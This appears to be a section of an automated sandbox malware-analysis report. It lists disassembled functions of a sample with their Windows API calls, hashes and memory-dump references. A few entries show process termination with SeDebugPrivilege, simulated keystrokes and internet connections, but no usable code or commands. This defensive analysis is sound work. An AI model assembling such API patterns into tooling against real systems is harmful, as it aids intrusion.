Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: a54e8c57668178fe618a0f53269586cb17aa08ade22b8293f07674753c3372a7
Instruction ID: c817897e8d6673a4c98d478f42678a2aa4877db001d4428c1280e7314c8ec838
Opcode Fuzzy Hash: a54e8c57668178fe618a0f53269586cb17aa08ade22b8293f07674753c3372a7
Instruction Fuzzy Hash: 1F113A762B8317FAF6017620EC0ADA6339CEB06724F304017FB0CA40D2EEB16C355A14

Uniqueness

Uniqueness Score: -1.00%

Function 0024CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0024CEB7
_free.LIBCMT ref: 0024CF22
_free.LIBCMT ref: 0024CF48
_free.LIBCMT ref: 0024CF71
_free.LIBCMT ref: 0024CFA9
_free.LIBCMT ref: 0024CFDA
_free.LIBCMT ref: 0024D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0024D09C
_free.LIBCMT ref: 0024D0B5

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: b3a8e7a9c89a2d1f958e2f487b004ba14730d653e62d6a483347a7079d47aa67
Instruction ID: 476647abcf2a1ae80c775624b67a74ba86af72bbe1b1599f1874fa7c4083f86a
Opcode Fuzzy Hash: b3a8e7a9c89a2d1f958e2f487b004ba14730d653e62d6a483347a7079d47aa67
Instruction Fuzzy Hash: 9D618A71925202AFDB2DAFB9ECC5A6D7B95EF01310F25016FF9009B241DB759C298BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002A50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 002A5186
ShowWindow.USER32(?,00000000), ref: 002A51C7
ShowWindow.USER32(?,00000005), ref: 002A51CD
SetFocus.USER32 ref: 002A51D1

Part of subcall function 002A6FBA: DeleteObject.GDI32(00000000), ref: 002A6FE6

GetWindowLongW.USER32(?,000000F0), ref: 002A520D
SetWindowLongW.USER32 ref: 002A521A
InvalidateRect.USER32(?,00000000,00000001), ref: 002A524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 002A5287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 002A5296

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: aee1f175c63d25fe4187c3b4106ec19a8f7e1e2b5c4f988466c1463a29b1c4f8
Instruction ID: 1d3b0e9bc3c2652796329acdeff7ed6613ae9201834bec77bdc8d42c31aa4a7e
Opcode Fuzzy Hash: aee1f175c63d25fe4187c3b4106ec19a8f7e1e2b5c4f988466c1463a29b1c4f8
Instruction Fuzzy Hash: 2051B330A70A29BFEF249F24DC49BEA7B65EB06320F144011FA19962E1CF7599A0DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00228B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 00266890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002668A9
LoadImageW.USER32 ref: 002668B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002668D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002668F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00228874,00000000,00000000,00000000,000000FF,00000000), ref: 00266901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0026691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00228874,00000000,00000000,00000000,000000FF,00000000), ref: 0026692D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: f0f865cd53de4b730209d1bafc95415dddbb14207f6184e9ddf8e1b7f1638b0b
Instruction ID: 8d36efa06e05671b39732c864bc495474f4ae5071d7fe535d41f6fd9881bdd92
Opcode Fuzzy Hash: f0f865cd53de4b730209d1bafc95415dddbb14207f6184e9ddf8e1b7f1638b0b
Instruction Fuzzy Hash: C0519B70620206EFDB20CF64EC99FAA7BB5EB58754F10452CF906D72A0DB70E9A0DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0028C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0028C182
GetLastError.KERNEL32 ref: 0028C195
SetEvent.KERNEL32(?), ref: 0028C1A9

Part of subcall function 0028C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0028C272
Part of subcall function 0028C253: GetLastError.KERNEL32 ref: 0028C322
Part of subcall function 0028C253: SetEvent.KERNEL32(?), ref: 0028C336
Part of subcall function 0028C253: InternetCloseHandle.WININET(00000000), ref: 0028C341

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: b489d932794907c3e4d5cbba88b157877c79ce5f5c42af101c7f3965ddd55a2a
Instruction ID: aa4b79d1e37300ad84ab0958fd749cbe2d99e71ca01805045c59f0857aec250c
Opcode Fuzzy Hash: b489d932794907c3e4d5cbba88b157877c79ce5f5c42af101c7f3965ddd55a2a
Instruction Fuzzy Hash: E5318275111701AFDB21AFB5EC48A66BBF8FF59300B24841EF95682694DB31E8249F70

Uniqueness

Uniqueness Score: -1.00%

Function 002725A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00273A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00273A57
Part of subcall function 00273A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,002725B3), ref: 00273A5E
Part of subcall function 00273A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00273A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 002725BD
PostMessageW.USER32 ref: 002725DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002725DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 002725E9
PostMessageW.USER32 ref: 00272601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00272605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0027260F
PostMessageW.USER32 ref: 00272623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00272627

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 2e16f6f99e8a274efbb7df40fd70d704919c3e8be06fb3ca03cf3efc89cc9925
Instruction ID: 6fa91216b085378eb6f77a41b2ea8298adaeb3baa77f03c85c94998fdc43fdac
Opcode Fuzzy Hash: 2e16f6f99e8a274efbb7df40fd70d704919c3e8be06fb3ca03cf3efc89cc9925
Instruction Fuzzy Hash: D101B1317A0210BBFB10A768AC8EF593E59DB8AB12F204011F318AE0D1CDF224559E69

Uniqueness

Uniqueness Score: -1.00%

Function 00271803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00271449,?,?,00000000), ref: 0027180C
HeapAlloc.KERNEL32(00000000,?,00271449,?,?,00000000), ref: 00271813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00271449,?,?,00000000), ref: 00271828
GetCurrentProcess.KERNEL32(?,00000000,?,00271449,?,?,00000000), ref: 00271830
DuplicateHandle.KERNEL32 ref: 00271833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00271449,?,?,00000000), ref: 00271843
GetCurrentProcess.KERNEL32(00271449,00000000,?,00271449,?,?,00000000), ref: 0027184B
DuplicateHandle.KERNEL32 ref: 0027184E
CreateThread.KERNEL32(00000000,00000000,00271874,00000000,00000000,00000000), ref: 00271868

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 21d01cf78d86c8a15184691902e025fe660c0070a26b06d07f9ea3cc88baf7b2
Instruction ID: c4bed47fdf01e8593b838b3626b56e3cb459327b3d905a01ef38217c8ad30245
Opcode Fuzzy Hash: 21d01cf78d86c8a15184691902e025fe660c0070a26b06d07f9ea3cc88baf7b2
Instruction Fuzzy Hash: 3801BF75340304BFE710ABA5EC4DF573BACEB8AB11F104411FA05DB191DE709810CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0029A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0027D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0027D501
Part of subcall function 0027D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0027D50F
Part of subcall function 0027D4DC: CloseHandle.KERNEL32(00000000), ref: 0027D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0029A16D
GetLastError.KERNEL32 ref: 0029A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0029A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0029A268
GetLastError.KERNEL32(00000000), ref: 0029A273
CloseHandle.KERNEL32(00000000), ref: 0029A2C4

Strings

SeDebugPrivilege, xrefs: 0029A18F

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 2add40e3a49415a0e06025f2c2867b656af06eeeb6067dbb7989003236051d98
Instruction ID: b13d53dc7bb79f29d6647d9e0b8023f617c194e97087ab7c8b93999475257a87
Opcode Fuzzy Hash: 2add40e3a49415a0e06025f2c2867b656af06eeeb6067dbb7989003236051d98
Instruction Fuzzy Hash: 06616E306143429FDB10DF18C494F55BBE1AF54318F14849CE46A4B7A2CB76EC55CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00232D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00232D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00232D53
_ValidateLocalCookies.LIBCMT ref: 00232DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00232E0C
_ValidateLocalCookies.LIBCMT ref: 00232E61

Strings

&H#, xrefs: 00232DFE, 00232E07, 00232E18
csm, xrefs: 00232DF6

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &H#$csm
API String ID: 1170836740-98951210
Opcode ID: 7d5947761b4c4a3e2a29ec450276a8016e24f6def44634d0ce293af4d2009186
Instruction ID: 588a6868b0e7843ded3a1eedbdee14006cf7fccfbb3c672c23b648a0af5e84c3
Opcode Fuzzy Hash: 7d5947761b4c4a3e2a29ec450276a8016e24f6def44634d0ce293af4d2009186
Instruction Fuzzy Hash: 1141B5B4A2020DEBCF10DF68C845A9EBBB5BF45315F148156E815AB392D731EA29CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 0027C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 0027C913

Strings

blank, xrefs: 0027C895
warning, xrefs: 0027C8FC
stop, xrefs: 0027C8E4
question, xrefs: 0027C8CC
info, xrefs: 0027C8B4

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: fed24a9f0546e549119a30079a8171860341028dabb31a2b73e096a9beb63332
Instruction ID: 4395393eba585eb737826c4316384504fbef8517adadfce66496d8606fc3878d
Opcode Fuzzy Hash: fed24a9f0546e549119a30079a8171860341028dabb31a2b73e096a9beb63332
Instruction Fuzzy Hash: 8711EB316B930BFBA7016F64DC82DFAA79CDF16354B30406FFA08A6382D7B06D205665

Uniqueness

Uniqueness Score: -1.00%

Function 02A0C290 Relevance: 12.2, APIs: 8, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 02A0C2B7
_free.LIBCMT ref: 02A0C322
_free.LIBCMT ref: 02A0C348
_free.LIBCMT ref: 02A0C371
_free.LIBCMT ref: 02A0C3A9
_free.LIBCMT ref: 02A0C3DA
_free.LIBCMT ref: 02A0C41B
_free.LIBCMT ref: 02A0C4B5

Memory Dump Source

Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_29d0000_YED.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 9f0f20281c48753d05d8944911a4b82861b6959897dfc66cfb2c70a3aa9a6715
Instruction ID: 7b78f134e2511c621b98c664e76f657f42e83ea4d2adae4dddeec0e6fc36d558
Opcode Fuzzy Hash: 9f0f20281c48753d05d8944911a4b82861b6959897dfc66cfb2c70a3aa9a6715
Instruction Fuzzy Hash: 56612571941305AFDB20AFA4B9C0B6DBBA7AF05334F0402AFE945972C1EF329800CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0027ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0027ED2A
_wcslen.LIBCMT ref: 0027ED3B
_wcslen.LIBCMT ref: 0027ED79
_wcslen.LIBCMT ref: 0027EDAF
_wcslen.LIBCMT ref: 0027EDDF
_wcslen.LIBCMT ref: 0027EDEF
_wcslen.LIBCMT ref: 0027EE2B
_wcslen.LIBCMT ref: 0027EE5A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 4a63d7f2873d641925c3e9edc4ab72401004e401e3b784dcc996226ba96164e7
Instruction ID: af112018266f63c60a2535f5c8ff93501216b2e3d2f46ecdd413e34c087d4faa
Opcode Fuzzy Hash: 4a63d7f2873d641925c3e9edc4ab72401004e401e3b784dcc996226ba96164e7
Instruction Fuzzy Hash: B9418AA5C2111876CB11FBF4888AACF77ACAF49710F518593F918E3112FB34E265C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 002A2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 002A2D1B
GetDC.USER32(00000000), ref: 002A2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 002A2D2E
ReleaseDC.USER32(00000000,00000000), ref: 002A2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002A2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002A2D87
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002A2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002A2DE1

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: fef4013b8fcc33ddd3341ec4aeb475c7e85e697776b3addf528a336dbac92f91
Instruction ID: e9adbc59af46f9306f6a7c3fd12602b9a77583ff2420727f5fe0ff66a60ac3d6
Opcode Fuzzy Hash: fef4013b8fcc33ddd3341ec4aeb475c7e85e697776b3addf528a336dbac92f91
Instruction Fuzzy Hash: 0B31CE72211610BFEB158F14DC8AFEB3FADEF4A711F044055FE089A291CA758C50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00275622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00275637
_memcmp.LIBVCRUNTIME ref: 00275659
_memcmp.LIBVCRUNTIME ref: 00275671
_memcmp.LIBVCRUNTIME ref: 00275684
_memcmp.LIBVCRUNTIME ref: 0027569E
_memcmp.LIBVCRUNTIME ref: 002756B1
_memcmp.LIBVCRUNTIME ref: 002756C9
_memcmp.LIBVCRUNTIME ref: 002756E4

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 83aa021161bc98a0373fafcd22c20ee6aa5705318be48988d5ec01059f93c0a9
Instruction ID: fe07817dfa7f024de866226c3e7c45ea80e32ae10e479956bd6d5326be6a9454
Opcode Fuzzy Hash: 83aa021161bc98a0373fafcd22c20ee6aa5705318be48988d5ec01059f93c0a9
Instruction Fuzzy Hash: 36212CA1670A2A77D21899118E82FFAB36DAF12394F448021FD0C9A545FBF4EE3085E5

Uniqueness

Uniqueness Score: -1.00%

Function 00294FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0029502E, 00295383
Not an Object type, xrefs: 00295007

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 8a1b24fe44a760dca036a689dd5e988d7dc204d629d43ddea562fbfcf3af4f7a
Instruction ID: 40d01edd8230f04f071123f8c5be59648c07a58bcf6fd0d823b20ae9f5898a89
Opcode Fuzzy Hash: 8a1b24fe44a760dca036a689dd5e988d7dc204d629d43ddea562fbfcf3af4f7a
Instruction Fuzzy Hash: BAD1C271B1061A9FDF11CFA8C881BAEB7B5FF48344F148069E919AB281E770DD55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00251522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,002517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 002515CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00251651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,002517FB,?,002517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 002516E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 002516FB

Part of subcall function 00243820: RtlAllocateHeap.NTDLL(00000000,?,002E1444,?,0022FDF5,?,?,0021A976,00000010,002E1440,002113FC,?,002113C6,?,00211129), ref: 00243852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,002517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00251777
